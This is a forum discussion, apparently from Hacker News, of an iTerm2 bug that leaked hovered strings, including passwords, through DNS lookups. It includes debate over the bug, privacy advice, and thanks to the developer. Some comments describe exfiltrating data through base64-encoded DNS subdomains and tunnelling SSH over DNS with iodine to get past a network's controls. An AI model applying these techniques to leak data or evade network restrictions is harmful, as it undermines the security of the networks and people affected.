How does this coincide with the 3.1.1 release though? I was still on 3.0.15 and there are new features and other fixes in 3.1.x. Do the new features and the other fixes happen to be reasonably tested and ready already?
This is a deeply unkind thing to say to someone who donates their free time to provide a public good. George apologized for his oversight and fixed the problem. Take him at his word and thank him.
Uhh, to be fair both reports were answered with appropriate concerns.
First made it sound like a very specific issue for that one user, and was given a way to disable it for him.
Second made it sound like an entire class of users would need it off, and an option switch was provided.
What do you think is more probable, that he intentionally left that hole open despite not directly benefitting from it, or simply that when he answered both original reports and provided an appropriate solution, he didn't fully think about the details and implications of what those issues meant?
Have you really never have a closed issue come back to you "went from bad to worse, abort!“ ?
Don't beat yourself too much about it. Yes this was a serious security issue from my point of view. BUT to be honest I would probably have done the same mistake and your reaction time was more than adequate.
Thanks for the amazing job you are doing on iTerm it's a joy to use.
Just want to say a personal thank you for your work on it and for the quick response. iterm2 is truly one of those apps I can't believe I get to use for free - thank you.
This kind of response is amazing. Mistakes happen, it's the response and the resolution that matter. I was already a happy user. I am now even moreso. Well done.
That Google one uses a similar naming scheme to the servers used for video data for YouTube etc.
You just made me realize something, though. The Google and AWS examples you gave won't be able to do this, but if you set up wildcard DNS and tell DNS that you have your own nameserver via CNAME aliasing, you could make your software do a lookup for eg something like "bm9ib2R5IHdpbGwgZXZlciBub3RpY2UgaWYgSSB0cmFuc21pdCBkYXRhIGxpa2UgdGhpcyEKCg.example.com" and exfiltrate data via DNS request in the process. The server could then return 127.0.53.53 to mean "ACK; data received OK", whereas NXDOMAIN or any other error would mean to try again.
Hmmmmm. Wondering if I should delete this...
(I realize this is exactly how the Iodine DNS tunnel works. FWIW, freedns.afraid.org's free options are perfectly capable to get iodine working, I was very pleased to discover.)
I know several people who use these sorts of techniques to exfiltrate data from a network where you don't have outbound TCP but you can leak information through DNS. As you mentioned, Iodine lets you do this (though by default it tries to use VOID DNS responses that are blocked by a lot of networks).
It's pretty cool being able to do an rsync-over-DNS.
> VOID DNS responses that are blocked by a lot of networks
For ages I've been meaning to [figure out how to] report this to the iodine dev, but I actually set up iodine specifically to get a working network while I knew I'd briefly be visiting a hospital.
I discovered to my amusement that the (public!) hospital's IT infra is really, really good; I was trying to SSH directly on top of the iodine tunnel, and while the first few DNS requests associated with the connection setup would work and I'd get as far as getting a shell prompt, but everything would rapidly screech to a halt and jam up pretty much instantly after that; maybe I'd get a single character typed, then it would completely die. I figured I was looking at a remarkably well-put-together leaky-bucket implementation.
So I tried hacking usleep()s into likely-looking spots in the code, but that didn't seem to slow it down enough. iodine is a rather interesting program internally, and a quick overview while distractedly sitting in a waiting area wasn't entirely sufficient to figure out why I didn't seem to be slowing it down enough to be a problem.
Before this "production" test, I previously verified that iodine was working by running the client on an AWS box. IIRC, ping ran over the link for quite some time (less than an hour; many minutes) without a single hitch.
On another note, I found that iodine seemed utterly incapable of setting up a correctly-configured tunnel on my Arch (receiving/server) box; I always had to ifconfig the tunnel (I forget exactly) to make it work. Problem with that was, my ifconfig-ing only routed one specific IP address, iodine wanted to give connections their own discrete IPs, and old sessions that locked up would take a while to time out. So I made a gigantic hack-script that would repeatedly kill iodine over and over every 1.5 minutes if it didn't see an authenicated SSH login. Would be nice for everything to just work properly...
I woke up in the middle of the night, seized by the realization that this meant that Adobe knows, down to the half-minute resolution, when I am using my computer (to do anything).
I've been running this command on my mac for over 10 minutes, trying different stuff, nothing. Also tried "sudo tcpdump -i any -s 0 -n port 53 -v". What's going on?
At least with the AWS ELB ones, the names can't be wildcards, so the only information that can be transmitted is info that the other party had set up ahead of time. 'gzunified-ecselast-1isehuisml2g4-663788831' is actually in someone's ELB list somewhere.
EDIT: For those who want to know how to determine that in the future, hit a generic ELB hostname with SSL and you should get the cert mismatch warning back with details.
I recently switched back to Terminal.app due to poor performance in iTerm 2. Keystrokes were lagging to the point it got frustrating. Then a few days ago someone pointed out that I should try the iTerm 2 nightly build, and sure enough the lag is gone, so I'm now back on iTerm 2 again.
It never ceases to amaze me how otherwise intelligent people think it‘s a good idea to send unencrypted user data to random servers on the internet in the background.
Come on, it's doing domain lookups, it's not sending social security numbers to Russia. The amount of hyperbole regarding this misfeature is absurd. It was something that maybe should have been better expressed but this is not some kind of massive security failure.
It doesn’t matter what the code intends to do. Sure, looking up strings that look like domains seems harmless.
But it means that every string that looks like a domain is transmitted unencrypted over the internet.
If your software deals with private user data, you must consider the side effects of every API you are calling. You can’t just transmit data somewhere and hope that everyone will do the right thing. Network traffic is monitored on lots of networks. Unless the data is encrypted and you have reason to trust the receiver, don’t send it.
And whatever you do, don’t send private data without user action. Users expect web requests to be made when clicking a link. They do not expect data to be transmitted when hovering the mouse over URLs.
It absolutely matters what the code intends to do. If it intends to do a DNS lookup, and does that, that's working properly, eepecially if it's doing an DNS lookup on what its regex says looks like a clickable URL. If it means to store an SSN in an encrypted DB and accidentally writes it to plaintext or sends it to twitter, that's a security flaw. If that same app is following the system standard method of doing DNS resolutions, what else should it do? Are you really suggesting that it should somehow encrypt a DNS lookup? Why should this app be held to a higher standard than every single other application that does DNS lookups? This is the absurdity I'm talking about.
I completely agree that one must take into account how that feature fits with your product, user expectations, and privacy, but none of that means a feature that works as intended is a security flaw.
As others have said, prefetching pages has been done for years. Checking to see if it's a valid domain isn't an unreasonable feature for iTerm's URL highlighting, and for those who would prefer it not, he's changed that behavior, but let's not pretend that it was some absurd use of data that no one could have reasonably predicted.
And lastly, let's also stop clutching our pearls about "transmitting data". IT did a DNS lookup, and while technically that means there was a transmission, it wasn't taking what people traditionally call user data and transmitting it to a foreign third party. It's perfectly reasonable to check a domain name against a DNS server. Maybe unwanted, yes, but not even remotely irrational or irresponsible.
This wasn't an accident, it deliberately looked up domain looking string against a DNS server. Don't patronize me, going by your twitter picture, I've been at a command shell longer than you've been alive, I damn well know the difference. I also know that doing DNS lookups (the the user's chosen DNS server, rather than some secret one) on domain-name looking data isn't evil or completely unreasonable. He should have made it clear and opt-in rather than opt-out as it was, but by no means was this a vulnerability. If the user can't trust their domain server for domain-like data, they shouldn't use that server.
> What happened: iTerm sent various things (including passwords) in plain text to my ISP's DNS server
iTerm was accidentally transmitting passwords in plain text via the network.
I'm pretty sure transmitting passwords in plain text isn't "working as intended".
Sure, you can go blame the user for not knowing that iTerm makes DNS queries when you hold down the command key.
But if you want to make secure software, you can't just tell the user it's their fault. You need to make sure that accidentally disclosing private information is not something that easily happens.
You're purposefully putting intent on software. It didn't send passwords, it sent strings that looked like a domain to a regex. It did not send a message to a DNS server "Hey DNS server, this is a password!" The user happened to want to use that string for a password.
It makes me scared to be an iTerm2 user, frankly. Because I am an idiot, it never occurred to me that I'd have to wonder about the security implications of my choice of terminal emulator. Does it otherwise have a good reputation for security?
iTerm2 is great and George is absolutely responsive with any issue I've ever brought up. I am personally going to give him the benefit of the doubt here, I'm sure he'll fix things ASAP.
I don't think it's worth throwing the baby out with the bathwater. But this should at a minimum be an opt-in feature, and not opt-out. Better yet, it's probably not needed. I've almost never needed to interact with URLs in a clickable way via a terminal.
Clickable URLs are very convenient. I have plenty of code that runs on remote machines and generates data that I'd like to view in my browser. Print the URL out, and I can click on it to open it up.
n.b. for me, in iTerm2, I have to press cmd to make the links highlight before I can click on them - so there's little danger of accidentally opening something you didn't want to.
Doing any DNS before clicking on the links seems like overkill, though. My browser can tell me if the URL is garbage or not.
The author has fixed it, and clearly this has been an educational experience. Considering the professionalness of the rest of the app, I get the impression that the author is likely going to factor security considerations into the picture in a big way in the future.
One of the nice things about GitLab instead of GitHub is that there isn't a flood of low-information, high-anger comments once a thread makes the HN front page.
What's more interesting to me is that some people are okay with a lookup on click but not a lookup on hover. It seems a difference in affirmative intent exists between hover and click; and more generally perhaps categories of user actions should be formalized into degrees of affirmation that could mitigate errors like this.
If i use iTerm's autocopy feature (e.g. that the selected text automatically goes to the clipboard) and rarely press CMD+C then i'm safe? Or should i start changing my passwords? Since i usually generate passwords with `pwgen`, then copy with double click.
Wow, this reminds me of how Cisco routers automatically try to SSH to anything that isn't a recognized command. (I may be mis-remembering part of this)
This throws out behaviour that some people find desireable (for example https://news.ycombinator.com/item?id=15288935 ), whereas it is possible to keep that behaviour without the privacy violations.
It's a shame DNS traffic isn't at least encrypted. That doesn't solve the whole problem (you're still sending data to a potentially untrusted DNS server) but it'd help a little.
a local firewall (hands off & little snitch are handy commercial ones for mac) will help you catch these kinds of info leaks (i caught this one a long time ago because of mine).
it does come with a time cost however--little popups every time you launch a new application or connect to a new service that you have to evaluate and handle, since you haven't set rules for them already.
but i do distinctly remember getting alerts for this and being annoyed enough to go figure out how to disable the feature in iterm2 (it was at least a couple years ago, so my memory is hazy).
maybe someone with more recent experience can clear up the mystery for us. =)
You said it right - can help defend. On the other end of your dnscrypt tunnel, the queries will still go out unencrypted. They will just be harder to correlate to you specifically.